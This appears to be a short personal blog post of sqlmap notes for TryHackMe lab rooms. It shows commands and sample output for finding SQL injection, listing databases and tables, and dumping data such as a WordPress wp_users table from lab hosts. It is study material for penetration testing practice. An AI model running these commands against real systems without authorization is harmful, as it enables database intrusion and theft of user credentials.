Skip to main content

sqlmap: Notes

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

apt install sqlmap

sqlmap -u http://10.10.239.79 --forms --dump

Use sqlmap with Burp Suite

sqlmap -r filename-saved-from-burpsuite

sqlmap -r sqlinjection2 --tamper=space2comment --dbms=sqlite --dump --level 5

Example: Dump SQlite

# sqlmap -r sqli-day5 --level 2 --batch --dbms=SQlite --dump

List all databases

# sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql --dbs
...
[19:05:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:05:23] [INFO] fetching database names
[19:05:24] [INFO] retrieved: 'information_schema'
[19:05:24] [INFO] retrieved: 'wackopicko'
available databases [2]:
[*] information_schema
[*] wackopicko
...

List tables in a database

sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql -D wackopicko --tables
...
[19:09:12] [INFO] testing MySQL
[19:09:12] [INFO] confirming MySQL
[19:09:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.0
[19:09:13] [INFO] fetching tables for database: 'wackopicko'
[19:09:13] [INFO] retrieved: 'admin'
[19:09:14] [INFO] retrieved: 'admin_session'
[19:09:14] [INFO] retrieved: 'cart'
[19:09:14] [INFO] retrieved: 'cart_coupons'
[19:09:14] [INFO] retrieved: 'cart_items'
[19:09:15] [INFO] retrieved: 'comments'
[19:09:15] [INFO] retrieved: 'comments_preview'
[19:09:15] [INFO] retrieved: 'conflict_pictures'
[19:09:15] [INFO] retrieved: 'coupons'
[19:09:15] [INFO] retrieved: 'guestbook'
[19:09:16] [INFO] retrieved: 'own'
[19:09:16] [INFO] retrieved: 'pictures'
[19:09:16] [INFO] retrieved: 'users'
Database: wackopicko
...

Exampe dumb data from wp_users table of wordpress database

sqlmap -u http://wekor.thm/it-next/it_cart.php --forms --dbms=mysql -D wordpress -T wp_users --dump --batch

Reference

>>> sqlmap cheat sheet

>>> THM | 25 Days of Cyber Security - Day 5

Practice

>>> https://tryhackme.com/room/ccpentesting

>>> The Cod Caper | Task 4 - Web Exploitation

>>> THM Advant of Cyber 2 | Task 10 - Day 5

>>> THM | SQL Injection Lab

>>> THM | 25 Days of Cyber Security - Day 5

>>> THM | Wekor

>>> THM | WebAppSec 101

Labels

Labels:

Popular posts from this blog

VMware ESXi host loads ipmi_si_drv too long

Workaround: remove ipmi_si_drv esxcli software vib remove --dry-run --vibname ipmi-ipmi-si-drv esxcli software vib remove --vibname ipmi-ipmi-si-drv ~ # esxcli software vib remove --dry-run --vibname ipmi-ipmi-si-drv Removal Result    Message: Dryrun only, host not changed. The following installers will be applied: [BootBankInstaller]    Reboot Required: true    VIBs Installed:    VIBs Removed: VMware_bootbank_ipmi-ipmi-si-drv_39.1-4vmw.550.0.0.1331820    VIBs Skipped: ~ # ~ # esxcli software vib remove --vibname ipmi-ipmi-si-drv Removal Result    Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective.    Reboot Required: true    VIBs Installed:    VIBs Removed: VMware_bootbank_ipmi-ipmi-si-drv_39.1-4vmw.550.0.0.1331820    VIBs Skipped: ~ #
Read more

hmailserver: Notes from the field

hmailserver is one of free open source mail servers running on Microsoft Windows operating system.
Read more

Install Microsoft .NET Core SDK

.NET Core Software Development Kit (SDK) is a set of libraries and tools that allow developers to create .NET Core applications and libraries.
Read more